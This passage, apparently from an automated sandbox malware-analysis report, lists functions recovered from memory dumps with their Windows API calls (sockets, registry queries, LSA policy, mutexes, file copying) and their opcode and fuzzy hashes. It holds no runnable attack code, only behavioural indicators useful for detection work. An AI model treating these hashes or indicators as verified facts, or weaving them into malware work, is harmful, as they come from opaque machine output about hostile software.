                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5BEE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: fdf22f0b2dbec5c916fe4c3a2fbf7086e52c83bdfd205e09d8228b779be9702d
                                                                                              • Instruction ID: 3d56dcc2080d4f9178eacdeca5eff6802d5a9f66ca747319392ca1aa4a5dbd31
                                                                                              • Opcode Fuzzy Hash: fdf22f0b2dbec5c916fe4c3a2fbf7086e52c83bdfd205e09d8228b779be9702d
                                                                                              • Instruction Fuzzy Hash: 5121F8B54087806FE7128B25DC41BA2BFB8EF42720F0885DAED849B153D324A909C775
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E05BA, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 024E0645
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileMappingOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1680863896-0
                                                                                              • Opcode ID: fda47737c2f8ecf05d738d4d42f8312751ac90347a77b25b691a9b6b3b839b72
                                                                                              • Instruction ID: f5890d5b9ed79ecc45176e6f662a6241da5ca5073c155a67dbf5ff7bf5ebcf98
                                                                                              • Opcode Fuzzy Hash: fda47737c2f8ecf05d738d4d42f8312751ac90347a77b25b691a9b6b3b839b72
                                                                                              • Instruction Fuzzy Hash: F721D1B1505380AFEB22CB25CC44F66FFE8EF05210F0884AEE9859B242D375E808C761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5B95E, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 00C5B9EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Socket
                                                                                              • String ID:
                                                                                              • API String ID: 38366605-0
                                                                                              • Opcode ID: 906c8730a8872547042388c69073785b166b53fb45beac97e7e7256e4249c6ed
                                                                                              • Instruction ID: b3b4d636c35583746626a101148781dbf296ad06212c25ef95b690f16520b714
                                                                                              • Opcode Fuzzy Hash: 906c8730a8872547042388c69073785b166b53fb45beac97e7e7256e4249c6ed
                                                                                              • Instruction Fuzzy Hash: F8217E71509780AFE722CF65DC44B56FFF8EF05310F08849EE9859B252D365A908CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E2E78, Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CopyFileW.KERNELBASE(?,?,?), ref: 024E2EFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CopyFile
                                                                                              • String ID:
                                                                                              • API String ID: 1304948518-0
                                                                                              • Opcode ID: c097d6e57c87486db9e4daf9444910b84ffc2efb319318a41f6e1d8f0fa9134a
                                                                                              • Instruction ID: 37f60a2cfb2647773bfacdf4270d86d9d6e94856c167e324bee921540143b956
                                                                                              • Opcode Fuzzy Hash: c097d6e57c87486db9e4daf9444910b84ffc2efb319318a41f6e1d8f0fa9134a
                                                                                              • Instruction Fuzzy Hash: 0A217F715093809FDB12CB25DC85B53BFB8EF06210F0984EBE985DB263D264D808CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5BD7E, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00C5BDFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 7883c7a433a39e6d141a9fcb733d137362ea758d0edc4d684fa8dfe84f1a2807
                                                                                              • Instruction ID: e36b336bd59e5a61127170c5a5a4a0047542768d444ccb58d307037d6b81772f
                                                                                              • Opcode Fuzzy Hash: 7883c7a433a39e6d141a9fcb733d137362ea758d0edc4d684fa8dfe84f1a2807
                                                                                              • Instruction Fuzzy Hash: CB21B075500240AFEB21CF66CC85BA6FFE8EF08310F188469EE899B251D771E948CB75
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E031E, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E03B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: c9463d895122c99451f7de82ab9c5159202f8ba0318356b473d9167a8b383511
                                                                                              • Instruction ID: b30ede7518149f91fb2225b97ba8f506f1b32210fb96244ab093f573b5b1d747
                                                                                              • Opcode Fuzzy Hash: c9463d895122c99451f7de82ab9c5159202f8ba0318356b473d9167a8b383511
                                                                                              • Instruction Fuzzy Hash: 32219072508344AFEB21CF55CC84F57BFB8EF05210F08859AE985AB252D3A4E408C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5ABD2, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00C5AC51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 89f3ae27a3d276ff97e35b18867cad1aa06da61d603ad99e91f96ac24cf7e699
                                                                                              • Instruction ID: 83507cc6ff3619db0120c90b39e0ce04c6b0db45a5fe76b8ffb1943976d580ae
                                                                                              • Opcode Fuzzy Hash: 89f3ae27a3d276ff97e35b18867cad1aa06da61d603ad99e91f96ac24cf7e699
                                                                                              • Instruction Fuzzy Hash: 6921D4B2500204AFE7218B5ACC84FABFBECEF04311F14855AEE459B241D621F9488BB6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E102D, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • getsockname.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E10B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getsockname
                                                                                              • String ID:
                                                                                              • API String ID: 3358416759-0
                                                                                              • Opcode ID: 10ffded542598b8d4cb6f8701dd8206397890e1b93435478568f7659c1af2993
                                                                                              • Instruction ID: 41a1fa4014083c8be821543077311ce167311d38202800b1c2ea73f41ecc0b68
                                                                                              • Opcode Fuzzy Hash: 10ffded542598b8d4cb6f8701dd8206397890e1b93435478568f7659c1af2993
                                                                                              • Instruction Fuzzy Hash: 962171715083846FEB21CB65DC84F97BFA8EF45210F0884ABEA499B152D774A908CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E00E2, Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0161
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: 35fed9439c7ce0585187d1ac57f527ad181f378f5a5e6937125588528611666d
                                                                                              • Instruction ID: f217b4cdfc6a557f416d99d9d86419390a97e2baeade736f9d514b6d9077e9c0
                                                                                              • Opcode Fuzzy Hash: 35fed9439c7ce0585187d1ac57f527ad181f378f5a5e6937125588528611666d
                                                                                              • Instruction Fuzzy Hash: A521A4B2404340AFEB228F55DC44FA7BFB8EF45710F04846AFA859B152D375A408C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5B44E, Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LsaOpenPolicy.ADVAPI32(?,00000E80), ref: 00C5B4BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: OpenPolicy
                                                                                              • String ID:
                                                                                              • API String ID: 2030686058-0
                                                                                              • Opcode ID: fa1a6344b419619fbfe6078669ed1e3ddc50b5bb18cace1de499b7eed544dc56
                                                                                              • Instruction ID: a1e9a35e0a15bb85b804ddcad87fbd7078b508b8b4504478952381270d6fb3b1
                                                                                              • Opcode Fuzzy Hash: fa1a6344b419619fbfe6078669ed1e3ddc50b5bb18cace1de499b7eed544dc56
                                                                                              • Instruction Fuzzy Hash: 2921C076500204AFEB20DF69DC85F6AFFE8EF04321F14886AED459B242D764E9488B75
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E0A56, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateMutexW.KERNELBASE(?,?), ref: 024E0AC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateMutex
                                                                                              • String ID:
                                                                                              • API String ID: 1964310414-0
                                                                                              • Opcode ID: e36e85599853d09e91d9df78b354e946ebc353954b59d8e3ccfbad52b022d2d3
                                                                                              • Instruction ID: f8acff6efd61e7bab60b0038347177fbe8165c456215dbdd4b4741ad2acc9773
                                                                                              • Opcode Fuzzy Hash: e36e85599853d09e91d9df78b354e946ebc353954b59d8e3ccfbad52b022d2d3
                                                                                              • Instruction Fuzzy Hash: 65219F71600244AFFB20DF69DC85B66FBE8EF14315F14846AE9499B282D7B1E405CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E1111, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ioctlsocket.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E118F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ioctlsocket
                                                                                              • String ID:
                                                                                              • API String ID: 3577187118-0
                                                                                              • Opcode ID: 274a52d228a81a59a75f9eb3eebc19bcd029a2e827827cfba835d019217cc427
                                                                                              • Instruction ID: 8c534d7fb7571441b3df47a60990ba08c5dfaf7fe3aadd0257051515713a34fc
                                                                                              • Opcode Fuzzy Hash: 274a52d228a81a59a75f9eb3eebc19bcd029a2e827827cfba835d019217cc427
                                                                                              • Instruction Fuzzy Hash: FD2162715093846FEB12CB559C84F96BFB8EF45310F0884ABE9899B152D374A508C766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5ACDA, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5AD54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 2fdec996353f42b55936fc6cc2f79bfe627492bd696c94f3b2a013751b810e69
                                                                                              • Instruction ID: db5b1a2cc2b8e26a50b61bf6d99344851ddcfd50a69a5b8c6ef46c9352dac1e5
                                                                                              • Opcode Fuzzy Hash: 2fdec996353f42b55936fc6cc2f79bfe627492bd696c94f3b2a013751b810e69
                                                                                              • Instruction Fuzzy Hash: 3521C0B5600204AFE720DF16DC80FA6FBFCEF04712F14856AED499B651D760E948CA76
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5B132, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTokenInformation.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5B19C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationToken
                                                                                              • String ID:
                                                                                              • API String ID: 4114910276-0
                                                                                              • Opcode ID: 79390a48289679700def4a956dc5c822d0a2443c346bab3359b0332236412b65
                                                                                              • Instruction ID: ae85eaea334fa71234c7f0cf29945b4b0618728389596f1fb8f73fcc4cb6d2a1
                                                                                              • Opcode Fuzzy Hash: 79390a48289679700def4a956dc5c822d0a2443c346bab3359b0332236412b65
                                                                                              • Instruction Fuzzy Hash: 1911C0B1500604AFEB218F65DC80FABBFACEF04320F14846AEE459B141D760A948CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E1212, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: accept
                                                                                              • String ID:
                                                                                              • API String ID: 3005279540-0
                                                                                              • Opcode ID: 273fc4e61fd10ee0fd20fba5483ae9975a1f052afcd490ded8b1a86ecf5eb3fa
                                                                                              • Instruction ID: b5669df47b7e3f6bd96d48abe9a5d6cd9311f60e3842c8543dd77b2809a78b8a
                                                                                              • Opcode Fuzzy Hash: 273fc4e61fd10ee0fd20fba5483ae9975a1f052afcd490ded8b1a86ecf5eb3fa
                                                                                              • Instruction Fuzzy Hash: C921C370500240AFFB21CF65DD84B66FBE8EF04311F14846AED49AF241D775E804CA71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E05DA, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 024E0645
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileMappingOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1680863896-0
                                                                                              • Opcode ID: 519f026e6eff86d4cdf0907954ecf1e4b254f4279be9aa3444423b825f79acca
                                                                                              • Instruction ID: 8277c5446940b20f0dfcadc823755ced9451beceb85cf64e238363df4c1fa3d0
                                                                                              • Opcode Fuzzy Hash: 519f026e6eff86d4cdf0907954ecf1e4b254f4279be9aa3444423b825f79acca
                                                                                              • Instruction Fuzzy Hash: AB21F0B1500240AFFB20DF29DC85B66FBE8EF44720F04846AED49AB241D7B1E408CB75
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5BA43, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,?,?,?,?), ref: 00C5BAC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              • Opcode ID: 03b427a8a73fedae8418c23a169ca1d0bd59399571e29103f2658e6143654598
                                                                                              • Instruction ID: 336f7895dac844c975141a7b303f49fd0c9f9e7474acc11a0a5bb6596f3937ef
                                                                                              • Opcode Fuzzy Hash: 03b427a8a73fedae8418c23a169ca1d0bd59399571e29103f2658e6143654598
                                                                                              • Instruction Fuzzy Hash: 69217C354093C0AFDB128F65DC44AA2BFB4EF07320F0985DAE9C48F163D3659959DB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5B97E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 00C5B9EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Socket
                                                                                              • String ID:
                                                                                              • API String ID: 38366605-0
                                                                                              • Opcode ID: 095dfbcd6e528ce4e1977d47f429cb0bd08bb37922d16dee28c4976b621ad820
                                                                                              • Instruction ID: da55cb1192898b7d3a52463fa8849fce4c205a1c528a3c73050202faf09ba823
                                                                                              • Opcode Fuzzy Hash: 095dfbcd6e528ce4e1977d47f429cb0bd08bb37922d16dee28c4976b621ad820
                                                                                              • Instruction Fuzzy Hash: 2321DE71500240AFEB21CF65DC44B66FFE8EF04310F14846EEE859B242D375A808CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E06DA, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              • Opcode ID: cd594f572f0f15af90f35647a26660871c471e64fbf2a4010bf6dc07d7b10bc7
                                                                                              • Instruction ID: da873f0a555128fb9344bb2a08a0153dab0cf9855c8ce97b3a7ee6c041b9422f
                                                                                              • Opcode Fuzzy Hash: cd594f572f0f15af90f35647a26660871c471e64fbf2a4010bf6dc07d7b10bc7
                                                                                              • Instruction Fuzzy Hash: 3C21AE71500604AFEB21CF59DD85FA6FBE8EF04320F14845EEA89AB241D7B1A509CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E033E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E03B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: a7807e68d04497906e5fe41f54383f3b3f2302085bb8d04d80e9fd71fea203db
                                                                                              • Instruction ID: 38f256c63b3ab018ce8d8da3beabf38c448f523f5b2a884a97ec1f8ce27e194a
                                                                                              • Opcode Fuzzy Hash: a7807e68d04497906e5fe41f54383f3b3f2302085bb8d04d80e9fd71fea203db
                                                                                              • Instruction Fuzzy Hash: 00117CB2504604AFEB20CF55DC80F67BBA8EF04711F18956AEA96AB251D7A0E448CA71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E1B3D, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 024E1BB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadShim
                                                                                              • String ID:
                                                                                              • API String ID: 1475914169-0
                                                                                              • Opcode ID: acd262544a59b12ec29bcca4b8ae1071b3811e079d4be7476e5ab05774f69c4a
                                                                                              • Instruction ID: d069274f381773121259d3e082a515b565d802a330949676c0b9c59a4695af97
                                                                                              • Opcode Fuzzy Hash: acd262544a59b12ec29bcca4b8ae1071b3811e079d4be7476e5ab05774f69c4a
                                                                                              • Instruction Fuzzy Hash: BE2193B55093845FEB228E15DC44B63BFF8EF16215F08808AED89CB253E375E909C762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E0D26, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcessTimes.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0D85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ProcessTimes
                                                                                              • String ID:
                                                                                              • API String ID: 1995159646-0
                                                                                              • Opcode ID: 1956fa883dc53a639669f4cc3246ccdb5ae7daabbff64d32e8d11c7b321c2b51
                                                                                              • Instruction ID: 6307549461e230ab5c06068e7d1a99a0ad9867f4b2f3fee4ee83c4fd141a2c60
                                                                                              • Opcode Fuzzy Hash: 1956fa883dc53a639669f4cc3246ccdb5ae7daabbff64d32e8d11c7b321c2b51
                                                                                              • Instruction Fuzzy Hash: 2311B671500200AFEB21CF55DC85FAAFBA8EF44311F14846AEA559B251D7B5A444CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E1316, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAEventSelect.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E137A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EventSelect
                                                                                              • String ID:
                                                                                              • API String ID: 31538577-0
                                                                                              • Opcode ID: d3c8be4fdb8748c91e8ecf72565253ae5ccd7c6f58baf7e3069be12a5905b79a
                                                                                              • Instruction ID: 630828397f66da01d9ce824ba6316857675ac75fffa817015e0bf417d280e262
                                                                                              • Opcode Fuzzy Hash: d3c8be4fdb8748c91e8ecf72565253ae5ccd7c6f58baf7e3069be12a5905b79a
                                                                                              • Instruction Fuzzy Hash: AC1190B1900204AEEB11CB55DC84FABFBACEF44321F14846BEA499B241D774A808CBB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E1052, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • getsockname.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E10B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getsockname
                                                                                              • String ID:
                                                                                              • API String ID: 3358416759-0
                                                                                              • Opcode ID: 0e8a0439a73ea50131d13f099ac14fc54621457159bfe7776ceec65548037d5d
                                                                                              • Instruction ID: 9647e4e08e6b7b7d82915c231c2670bb659849dfedd925183e104c41937af932
                                                                                              • Opcode Fuzzy Hash: 0e8a0439a73ea50131d13f099ac14fc54621457159bfe7776ceec65548037d5d
                                                                                              • Instruction Fuzzy Hash: 0E1163B15002449EEB20CF55DC85BA7BBA8EF44711F148467EA4D9B641D774A848CA71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5A607, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C5A672
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 11b6b9732a6f5a6033891b3a2acd1db8bd5805b2240a55f0afa3dff5cd17cfda
                                                                                              • Instruction ID: 4081a3ff3e6150a3b70c045d8ca59fe0483804d14e537e70133f4eebaf6ea70f
                                                                                              • Opcode Fuzzy Hash: 11b6b9732a6f5a6033891b3a2acd1db8bd5805b2240a55f0afa3dff5cd17cfda
                                                                                              • Instruction Fuzzy Hash: 0111A271409380AFDB228F51DC44B62FFB4EF4A310F08859AED898B152D275A918DB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5A6B2, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(?), ref: 00C5A724
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              • Opcode ID: 664650f219291b46ec19d4350bf599af69afdab21ee64503105cfed91de67910
                                                                                              • Instruction ID: 1d0d6c48db3a73c92c7471c1caa970c62512f32e93802a98cc0170bf4b14a485
                                                                                              • Opcode Fuzzy Hash: 664650f219291b46ec19d4350bf599af69afdab21ee64503105cfed91de67910
                                                                                              • Instruction Fuzzy Hash: 9E116A754093C49FDB128B259C54B62BFB4EF07624F0980DBED849F263D265590CC772
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E0102, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0161
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: 2d9203f23fe061cd1d27aa52cd1b4deb1349b82d4a85a4215977d69ccc9264fb
                                                                                              • Instruction ID: ff283ef44e3f23c97a120fd7b4899e2181eb18d0e1c288fdeb8f083f93313721
                                                                                              • Opcode Fuzzy Hash: 2d9203f23fe061cd1d27aa52cd1b4deb1349b82d4a85a4215977d69ccc9264fb
                                                                                              • Instruction Fuzzy Hash: 0A11C471500204AFEB21CF55DC84FA6FBA8EF44311F14846AEA599F241C775A408CBB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E32AD, Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 024E3319
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: ddb8b4fdf1c5c8157f4da84e18332dcce7e3d2736b935d28db5dae3c31243d45
                                                                                              • Instruction ID: 685802130631c3f09a7ec538f0bbfff1e8c5a9b59ea16a9a058b88e7f4f191c9
                                                                                              • Opcode Fuzzy Hash: ddb8b4fdf1c5c8157f4da84e18332dcce7e3d2736b935d28db5dae3c31243d45
                                                                                              • Instruction Fuzzy Hash: 1711D0764097C09FDB138F25DC40B62FFB4EF46220F0880DBED858B263D265A918DB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E027A, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
